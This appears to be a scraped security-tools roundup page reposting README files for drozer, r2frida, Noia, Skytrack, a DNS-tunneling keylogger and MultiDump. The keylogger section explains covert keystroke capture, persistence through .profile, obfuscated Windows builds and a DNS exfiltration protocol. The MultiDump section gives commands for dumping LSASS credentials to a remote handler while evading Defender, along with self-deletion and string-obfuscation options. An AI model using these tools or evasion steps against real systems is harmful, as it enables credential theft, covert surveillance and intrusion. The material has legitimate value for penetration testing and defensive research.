        • The Docker container and basic setup instructions can be found here.
        • Instructions on building your own Docker container can be found here.

        Manual Building and Installation

        Prerequisites

        1. Python2.7

        Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable.

        1. Protobuf 2.6 or greater

        2. Pyopenssl 16.2 or greater

        3. Twisted 10.2 or greater

        4. Java Development Kit 1.7

        Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.

        1. Android Debug Bridge

        Building Python wheel

        git clone https://github.com/WithSecureLabs/drozer.git
        cd drozer
        python setup.py bdist_wheel

        Installing Python wheel

        sudo pip install dist/drozer-2.x.x-py2-none-any.whl

        Building for Debian/Ubuntu/Mint

        git clone https://github.com/WithSecureLabs/drozer.git
        cd drozer
        make deb

        Installing .deb (Debian/Ubuntu/Mint)

        sudo dpkg -i drozer-2.x.x.deb

        Building for Redhat/Fedora/CentOS

        git clone https://github.com/WithSecureLabs/drozer.git
        cd drozer
        make rpm

        Installing .rpm (Redhat/Fedora/CentOS)

        sudo rpm -I drozer-2.x.x-1.noarch.rpm

        Building for Windows

        NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn't be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.

        git clone https://github.com/WithSecureLabs/drozer.git
        cd drozer
        python.exe setup.py bdist_msi

        Installing .msi (Windows)

        Run dist/drozer-2.x.x.win-x.msi 

        Usage

        Installing the Agent

        Drozer can be installed using Android Debug Bridge (adb).

        Download the latest Drozer Agent here.

        $ adb install drozer-agent-2.x.x.apk

        Starting a Session

        You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you're ready to start exploring.

        We will use the server embedded in the drozer Agent to do this.

        If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:

        $ adb forward tcp:31415 tcp:31415

        Now, launch the Agent, select the "Embedded Server" option and tap "Enable" to start the server. You should see a notification that the server has started.

        Then, on your PC, connect using the drozer Console:

        On Linux:

        $ drozer console connect

        On Windows:

        > drozer.bat console connect

        If using a real device, the IP address of the device on the network must be specified:

        On Linux:

        $ drozer console connect --server 192.168.0.10

        On Windows:

        > drozer.bat console connect --server 192.168.0.10

        You should be presented with a drozer command prompt:

        selecting f75640f67144d9a3 (unknown sdk 4.1.1)  
        dz>

        The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.

        You are now ready to start exploring the device.

        Command Reference

        Command Description
        run Executes a drozer module
        list Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run.
        shell Start an interactive Linux shell on the device, in the context of the Agent process.
        cd Mounts a particular namespace as the root of session, to avoid having to repeatedly type the full name of a module.
        clean Remove temporary files stored by drozer on the Android device.
        contributors Displays a list of people who have contributed to the drozer framework and modules in use on your system.
        echo Print text to the console.
        exit Terminate the drozer session.
        help Display help about a particular command or module.
        load Load a file containing drozer commands, and execute them in sequence.
        module Find and install additional drozer modules from the Internet.
        permissions Display a list of the permissions granted to the drozer Agent.
        set Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer.
        unset Remove a named variable that drozer passes to any Linux shells that it spawns.

        License

        drozer is released under a 3-clause BSD License. See LICENSE for full details.

        Contacting the Project

        drozer is Open Source software, made great by contributions from the community.

        Bug reports, feature requests, comments and questions can be submitted here.



        R2Frida - Radare2 And Frida Better Together

        By: Zion3R


        This is a self-contained plugin for radare2 that allows to instrument remote processes using frida.

        The radare project brings a complete toolchain for reverse engineering, providing well maintained functionalities and extend its features with other programming languages and tools.

        Frida is a dynamic instrumentation toolkit that makes it easy to inspect and manipulate running processes by injecting your own JavaScript, and optionally also communicate with your scripts.


        Features

        • Run unmodified Frida scripts (Use the :. command)
        • Execute snippets in C, Javascript or TypeScript in any process
        • Can attach, spawn or launch in local or remote systems
        • List sections, symbols, exports, protocols, classes, methods
        • Search for values in memory inside the agent or from the host
        • Replace method implementations or create hooks with short commands
        • Load libraries and frameworks in the target process
        • Support Dalvik, Java, ObjC, Swift and C interfaces
        • Manipulate file descriptors and environment variables
        • Send signals to the process, continue, breakpoints
        • The r2frida io plugin is also a filesystem fs and debug backend
        • Automate r2 and frida using r2pipe
        • Read/Write process memory
        • Call functions, syscalls and raw code snippets
        • Connect to frida-server via usb or tcp/ip
        • Enumerate apps and processes
        • Trace registers, arguments of functions
        • Tested on x64, arm32 and arm64 for Linux, Windows, macOS, iOS and Android
        • Doesn't require frida to be installed in the host (no need for frida-tools)
        • Extend the r2frida commands with plugins that run in the agent
        • Change page permissions, patch code and data
        • Resolve symbols by name or address and import them as flags into r2
        • Run r2 commands in the host from the agent
        • Use r2 apis and run r2 commands inside the remote target process.
        • Native breakpoints using the :db api
        • Access remote filesystems using the r_fs api.

        Installation

        The recommended way to install r2frida is via r2pm:

        $ r2pm -ci r2frida

        Binary builds that don't require compilation will be soon supported in r2pm and r2env. Meanwhile feel free to download the last builds from the Releases page.

        Compilation

        Dependencies

        • radare2
        • pkg-config (not required on windows)
        • curl or wget
        • make, gcc
        • npm, nodejs (will be soon removed)

        In GNU/Debian you will need to install the following packages:

        $ sudo apt install -y make gcc libzip-dev nodejs npm curl pkg-config git

        Instructions

        $ git clone https://github.com/nowsecure/r2frida.git
        $ cd r2frida
        $ make
        $ make user-install

        Windows

        • Install meson and Visual Studio
        • Unzip the latest radare2 release zip in the r2frida root directory
        • Rename it to radare2 (instead of radare2-x.y.z)
        • To make the VS compiler available in PATH (preconfigure.bat)
        • Run configure.bat and then make.bat
        • Copy the b\r2frida.dll into r2 -H R2_USER_PLUGINS

        Usage

        For testing, use r2 frida://0, as attaching to the pid0 in frida is a special session that runs in local. Now you can run the :? command to get the list of commands available.

        $ r2 'frida://?'
        r2 frida://[action]/[link]/[device]/[target]
        * action = list | apps | attach | spawn | launch
        * link = local | usb | remote host:port
        * device = '' | host:port | device-id
        * target = pid | appname | process-name | program-in-path | abspath
        Local:
        * frida://? # show this help
        * frida:// # list local processes
        * frida://0 # attach to frida-helper (no spawn needed)
        * frida:///usr/local/bin/rax2 # abspath to spawn
        * frida://rax2 # same as above, considering local/bin is in PATH
        * frida://spawn/$(program) # spawn a new process in the current system
        * frida://attach/(target) # attach to target PID in current host
        USB:
        * frida://list/usb// # list processes in the first usb device
        * frida://apps/usb// # list apps in the first usb device
        * frida://attach/usb//12345 # attach to given pid in the first usb device
        * frida://spawn/usb//appname # spawn an app in the first resolved usb device
        * frida://launch/usb//appname # spawn+resume an app in the first usb device
        Remote:
        * frida://attach/remote/10.0.0.3:9999/558 # attach to pid 558 on tcp remote frida-server
        Environment: (Use the `%` command to change the environment at runtime)
        R2FRIDA_SAFE_IO=0|1 # Workaround a Frida bug on Android/thumb
        R2FRIDA_DEBUG=0|1 # Used to debug argument parsing behaviour
        R2FRIDA_COMPILER_DISABLE=0|1 # Disable the new frida typescript compiler (`:. foo.ts`)
        R2FRIDA_AGENT_SCRIPT=[file] # path to file of the r2frida agent

        Examples

        $ r2 frida://0     # same as frida -p 0, connects to a local session

        You can attach, spawn or launch to any program by name or pid, The following line will attach to the first process named rax2 (run rax2 - in another terminal to test this line)

        $ r2 frida://rax2  # attach to the first process named `rax2`
        $ r2 frida://1234 # attach to the given pid

        Using the absolute path of a binary to spawn will spawn the process:

        $ r2 frida:///bin/ls
        [0x00000000]> :dc # continue the execution of the target program

        Also works with arguments:

        $ r2 frida://"/bin/ls -al"

        For USB debugging iOS/Android apps use these actions. Note that spawn can be replaced with launch or attach, and the process name can be the bundleid or the PID.

        $ r2 frida://spawn/usb/         # enumerate devices
        $ r2 frida://spawn/usb// # enumerate apps in the first iOS device
        $ r2 frida://spawn/usb//Weather # Run the weather app

        Commands

        These are the most frequent commands, so you must learn them and suffix it with ? to get subcommands help.

        :i        # get information of the target (pid, name, home, arch, bits, ..)
        .:i* # import the target process details into local r2
        :? # show all the available commands
        :dm # list maps. Use ':dm|head' and seek to the program base address
        :iE # list the exports of the current binary (seek)
        :dt fread # trace the 'fread' function
        :dt-* # delete all traces

        Plugins

        r2frida plugins run in the agent side and are registered with the r2frida.pluginRegister API.

        See the plugins/ directory for some more example plugin scripts.

        [0x00000000]> cat example.js
        r2frida.pluginRegister('test', function(name) {
        if (name === 'test') {
        return function(args) {
        console.log('Hello Args From r2frida plugin', args);
        return 'Things Happen';
        }
        }
        });
        [0x00000000]> :. example.js # load the plugin script

        The :. command works like the r2's . command, but runs inside the agent.

        :. a.js  # run script which registers a plugin
        :. # list plugins
        :.-test # unload a plugin by name
        :.. a.js # eternalize script (keeps running after detach)

        Termux

        If you are willing to install and use r2frida natively on Android via Termux, there are some caveats with the library dependencies because of some symbol resolutions. The way to make this work is by extending the LD_LIBRARY_PATH environment to point to the system directory before the termux libdir.

        $ LD_LIBRARY_PATH=/system/lib64:$LD_LIBRARY_PATH r2 frida://...

        Troubleshooting

        Ensure you are using a modern version of r2 (preferibly last release or git).

        Run r2 -L | grep frida to verify if the plugin is loaded, if nothing is printed use the R2_DEBUG=1 environment variable to get some debugging messages to find out the reason.

        If you have problems compiling r2frida you can use r2env or fetch the release builds from the GitHub releases page, bear in mind that only MAJOR.MINOR version must match, this is r2-5.7.6 can load any plugin compiled on any version between 5.7.0 and 5.7.8.

        Design

         +---------+
        | radare2 | The radare2 tool, on top of the rest
        +---------+
        :
        +----------+
        | io_frida | r2frida io plugin
        +----------+
        :
        +---------+
        | frida | Frida host APIs and logic to interact with target
        +---------+
        :
        +-------+
        | app | Target process instrumented by Frida with Javascript
        +-------+

        Credits

        This plugin has been developed by pancake aka Sergi Alvarez (the author of radare2) for NowSecure.

        I would like to thank Ole AndrΓ© for writing and maintaining Frida as well as being so kind to proactively fix bugs and discuss technical details on anything needed to make this union to work. Kudos



        Noia - Simple Mobile Applications Sandbox File Browser Tool

        By: Zion3R


        Noia is a web-based tool whose main aim is to ease the process of browsing mobile applications sandbox and directly previewing SQLite databases, images, and more. Powered by frida.re.

        Please note that I'm not a programmer, but I'm probably above the median in code-savyness. Try it out, open an issue if you find any problems. PRs are welcome.


        Installation & Usage

        npm install -g noia
        noia

        Features

        • Explore third-party applications files and directories. Noia shows you details including the access permissions, file type and much more.

        • View custom binary files. Directly preview SQLite databases, images, and more.

        • Search application by name.

        • Search files and directories by name.

        • Navigate to a custom directory using the ctrl+g shortcut.

        • Download the application files and directories for further analysis.

        • Basic iOS support

        and more


        Setup

        Desktop requirements:

        • node.js LTS and npm
        • Any decent modern desktop browser

        Noia is available on npm, so just type the following command to install it and run it:

        npm install -g noia
        noia

        Device setup:

        Noia is powered by frida.re, thus requires Frida to run.

        Rooted Device

        See: * https://frida.re/docs/android/ * https://frida.re/docs/ios/

        Non-rooted Device

        • https://koz.io/using-frida-on-android-without-root/
        • https://github.com/sensepost/objection/wiki/Patching-Android-Applications
        • https://nowsecure.com/blog/2020/01/02/how-to-conduct-jailed-testing-with-frida/

        Security Warning

        This tool is not secure and may include some security vulnerabilities so make sure to isolate the webpage from potential hackers.

        LICENCE

        MIT



        Skytrack - Planespotting And Aircraft OSINT Tool Made Using Python

        By: Zion3R

        About

        skytrack is a command-line based plane spotting and aircraft OSINT reconnaissanceΒ tool made using Python. It can gather aircraft information using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general purposeΒ reconnaissance.


        What is Planespotting & Aircraft OSINT?

        Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, aircraft informationΒ gathering and OSINT is a crucial step in the planespotting process. OSINT (Open Source Intelligence) describes a methodology of using publicy accessible data sources to obtain data about a specific subject β€” in this case planes!

        Aircraft Information

        • Tail Number πŸ›«
        • Aircraft Type βš™οΈ
        • ICAO24 Designation πŸ”Ž
        • Manufacturer Details πŸ› 
        • Flight Logs πŸ“„
        • Aircraft Owner ✈️
        • Model πŸ›©
        • Much more!

        Usage

        To run skytrack on your machine, follow the steps below:

        $ git clone https://github.com/ANG13T/skytrack
        $ cd skytrack
        $ pip install -r requirements.txt
        $ python skytrack.py

        skytrack works best for Python version 3.

        Preview

        Features

        skytrack features three main functions for aircraft information

        gathering and display options. They include the following:

        Aircraft Reconnaissance & OSINT

        skytrack obtains general information about the aircraft given its tail number or ICAO designator. The tool sources this information using several reliable data sets. Once the data is collected, it is displayed in the terminal within a table layout.

        PDF Aircraft Information Report

        skytrack also enables you the save the collected aircraft information into a PDF. The PDF includes all the aircraft data in a visual layout for later reference. The PDF report will be entitled "skytrack_report.pdf"

        Tail Number to ICAO Converter

        There are two standard identification formats for specifying aircraft: Tail Number and ICAO Designation. The tail number (aka N-Number) is an alphanumerical ID starting with the letter "N" used to identify aircraft. The ICAO type designation is a six-character fixed-length ID in the hexadecimal format. Both standards are highly pertinent for aircraft

        reconnaissance as they both can be used to search for a specific aircraft in data sources. However, converting them from one format to another can be rather cumbersome as it follows a tricky algorithm. To streamline this process, skytrack includes a standard converter.

        Further Explanation

        ICAO and Tail Numbers follow a mapping system like the following:

        ICAO address N-Number (Tail Number)

        a00001 N1

        a00002 N1A

        a00003 N1AA

        You can learn more about aircraft registration numbers [here](https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers)

        :warning: Converter only works for USA-registered aircraft

        Data Sources & APIs Used

        ICAO Aircraft Type Designators Listings

        FlightAware

        Wikipedia

        Aviation Safety Website

        Jet Photos Website

        OpenSky API

        Aviation Weather METAR

        Airport Codes Dataset

        Contributing

        skytrack is open to any contributions. Please fork the repository and make a pull request with the features or fixes you want to implement.

        Upcoming

        • Obtain Latest Flown Airports
        • Obtain Airport Information
        • Obtain ATC Frequency Information

        Support

        If you enjoyed skytrack, please consider becoming a sponsor or donating on buymeacoffee in order to fund my future projects.

        To check out my other works, visit my GitHub profile.



        DNS-Tunnel-Keylogger - Keylogging Server And Client That Uses DNS Tunneling/Exfiltration To Transmit Keystrokes

        By: Zion3R


        This post-exploitation keylogger will covertly exfiltrate keystrokes to a server.

        These tools excel at lightweight exfiltration and persistence, properties which will prevent detection. It uses DNS tunelling/exfiltration to bypass firewalls and avoid detection.


        Server

        Setup

        The server uses python3.

        To install dependencies, run python3 -m pip install -r requirements.txt

        Starting the Server

        To start the server, run python3 main.py

        usage: dns exfiltration server [-h] [-p PORT] ip domain

        positional arguments:
        ip
        domain

        options:
        -h, --help show this help message and exit
        -p PORT, --port PORT port to listen on

        By default, the server listens on UDP port 53. Use the -p flag to specify a different port.

        ip is the IP address of the server. It is used in SOA and NS records, which allow other nameservers to find the server.

        domain is the domain to listen for, which should be the domain that the server is authoritative for.

        Registrar

        On the registrar, you want to change your domain's namespace to custom DNS.

        Point them to two domains, ns1.example.com and ns2.example.com.

        Add records that make point the namespace domains to your exfiltration server's IP address.

        This is the same as setting glue records.

        Client

        Linux

        The Linux keylogger is two bash scripts. connection.sh is used by the logger.sh script to send the keystrokes to the server. If you want to manually send data, such as a file, you can pipe data to the connection.sh script. It will automatically establish a connection and send the data.

        logger.sh

        # Usage: logger.sh [-options] domain
        # Positional Arguments:
        # domain: the domain to send data to
        # Options:
        # -p path: give path to log file to listen to
        # -l: run the logger with warnings and errors printed

        To start the keylogger, run the command ./logger.sh [domain] && exit. This will silently start the keylogger, and any inputs typed will be sent. The && exit at the end will cause the shell to close on exit. Without it, exiting will bring you back to the non-keylogged shell. Remove the &> /dev/null to display error messages.

        The -p option will specify the location of the temporary log file where all the inputs are sent to. By default, this is /tmp/.

        The -l option will show warnings and errors. Can be useful for debugging.

        logger.sh and connection.sh must be in the same directory for the keylogger to work. If you want persistance, you can add the command to .profile to start on every new interactive shell.

        connection.sh

        Usage: command [-options] domain
        Positional Arguments:
        domain: the domain to send data to
        Options:
        -n: number of characters to store before sending a packet

        Windows

        Build

        To build keylogging program, run make in the windows directory. To build with reduced size and some amount of obfuscation, make the production target. This will create the build directory for you and output to a file named logger.exe in the build directory.

        make production domain=example.com

        You can also choose to build the program with debugging by making the debug target.

        make debug domain=example.com

        For both targets, you will need to specify the domain the server is listening for.

        Sending Test Requests

        You can use dig to send requests to the server:

        dig @127.0.0.1 a.1.1.1.example.com A +short send a connection request to a server on localhost.

        dig @127.0.0.1 b.1.1.54686520717569636B2062726F776E20666F782E1B.example.com A +short send a test message to localhost.

        Replace example.com with the domain the server is listening for.

        Protocol

        Starting a Connection

        A record requests starting with a indicate the start of a "connection." When the server receives them, it will respond with a fake non-reserved IP address where the last octet contains the id of the client.

        The following is the format to follow for starting a connection: a.1.1.1.[sld].[tld].

        The server will respond with an IP address in following format: 123.123.123.[id]

        Concurrent connections cannot exceed 254, and clients are never considered "disconnected."

        Exfiltrating Data

        A record requests starting with b indicate exfiltrated data being sent to the server.

        The following is the format to follow for sending data after establishing a connection: b.[packet #].[id].[data].[sld].[tld].

        The server will respond with [code].123.123.123

        id is the id that was established on connection. Data is sent as ASCII encoded in hex.

        code is one of the codes described below.

        Response Codes

        200: OK

        If the client sends a request that is processed normally, the server will respond with code 200.

        201: Malformed Record Requests

        If the client sends an malformed record request, the server will respond with code 201.

        202: Non-Existant Connections

        If the client sends a data packet with an id greater than the # of connections, the server will respond with code 202.

        203: Out of Order Packets

        If the client sends a packet with a packet id that doesn't match what is expected, the server will respond with code 203. Clients and servers should reset their packet numbers to 0. Then the client can resend the packet with the new packet id.

        204 Reached Max Connection

        If the client attempts to create a connection when the max has reached, the server will respond with code 204.

        Dropped Packets

        Clients should rely on responses as acknowledgements of received packets. If they do not receive a response, they should resend the same payload.

        Side Notes

        Linux

        Log File

        The log file containing user inputs contains ASCII control characters, such as backspace, delete, and carriage return. If you print the contents using something like cat, you should select the appropriate option to print ASCII control characters, such as -v for cat, or open it in a text-editor.

        Non-Interactive Shells

        The keylogger relies on script, so the keylogger won't run in non-interactive shells.

        Windows

        Repeated Requests

        For some reason, the Windows Dns_Query_A always sends duplicate requests. The server will process it fine because it discards repeated packets.



        MultiDump - Post-Exploitation Tool For Dumping And Extracting LSASS Memory Discreetly

        By: Zion3R


        MultiDump is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python.

        Blog post: https://xre0us.io/posts/multidump


        MultiDump supports LSASS dump via ProcDump.exe or comsvc.dll, it offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis.

        Usage

            __  __       _ _   _ _____
        | \/ |_ _| | |_(_) __ \ _ _ _ __ ___ _ __
        | |\/| | | | | | __| | | | | | | | '_ ` _ \| '_ \
        | | | | |_| | | |_| | |__| | |_| | | | | | | |_) |
        |_| |_|\__,_|_|\__|_|_____/ \__,_|_| |_| |_| .__/
        |_|

        Usage: MultiDump.exe [-p <ProcDumpPath>] [-l <LocalDumpPath> | -r <RemoteHandlerAddr>] [--procdump] [-v]

        -p Path to save procdump.exe, use full path. Default to temp directory
        -l Path to save encrypted dump file, use full path. Default to current directory
        -r Set ip:port to connect to a remote handler
        --procdump Writes procdump to disk and use it to dump LSASS
        --nodump Disable LSASS dumping
        --reg Dump SAM, SECURITY and SYSTEM hives
        --delay Increase interval between connections to for slower network speeds
        -v Enable v erbose mode

        MultiDump defaults in local mode using comsvcs.dll and saves the encrypted dump in the current directory.
        Examples:
        MultiDump.exe -l C:\Users\Public\lsass.dmp -v
        MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 192.168.1.100:5000
        usage: MultiDumpHandler.py [-h] [-r REMOTE] [-l LOCAL] [--sam SAM] [--security SECURITY] [--system SYSTEM] [-k KEY] [--override-ip OVERRIDE_IP]

        Handler for RemoteProcDump

        options:
        -h, --help show this help message and exit
        -r REMOTE, --remote REMOTE
        Port to receive remote dump file
        -l LOCAL, --local LOCAL
        Local dump file, key needed to decrypt
        --sam SAM Local SAM save, key needed to decrypt
        --security SECURITY Local SECURITY save, key needed to decrypt
        --system SYSTEM Local SYSTEM save, key needed to decrypt
        -k KEY, --key KEY Key to decrypt local file
        --override-ip OVERRIDE_IP
        Manually specify the IP address for key generation in remote mode, for proxied connection

        As with all LSASS related tools, Administrator/SeDebugPrivilege priviledges are required.

        The handler depends on Pypykatz to parse the LSASS dump, and impacket to parse the registry saves. They should be installed in your enviroment. If you see the error All detection methods failed, it's likely the Pypykatz version is outdated.

        By default, MultiDump uses the Comsvc.dll method and saves the encrypted dump in the current directory.

        MultiDump.exe
        ...
        [i] Local Mode Selected. Writing Encrypted Dump File to Disk...
        [i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk.
        [i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
        ./ProcDumpHandler.py -f dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e

        If --procdump is used, ProcDump.exe will be writtern to disk to dump LSASS.

        In remote mode, MultiDump connects to the handler's listener.

        ./ProcDumpHandler.py -r 9001
        [i] Listening on port 9001 for encrypted key...
        MultiDump.exe -r 10.0.0.1:9001

        The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the --override-ip option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump -r.

        An additional option to dump the SAM, SECURITY and SYSTEM hives are available with --reg, the decryption process is the same as LSASS dumps. This is more of a convenience feature to make post exploit information gathering easier.

        Building MultiDump

        Open in Visual Studio, build in Release mode.

        Customising MultiDump

        It is recommended to customise the binary before compiling, such as changing the static strings or the RC4 key used to encrypt them, to do so, another Visual Studio project EncryptionHelper, is included. Simply change the key or strings and the output of the compiled EncryptionHelper.exe can be pasted into MultiDump.c and Common.h.

        Self deletion can be toggled by uncommenting the following line in Common.h:

        #define SELF_DELETION

        To further evade string analysis, most of the output messages can be excluded from compiling by commenting the following line in Debug.h:

        //#define DEBUG

        MultiDump might get detected on Windows 10 22H2 (19045) (sort of), and I have implemented a fix for it (sort of), the investigation and implementation deserves a blog post itself: https://xre0us.io/posts/saving-lsass-from-defender/

        Credits



        ❌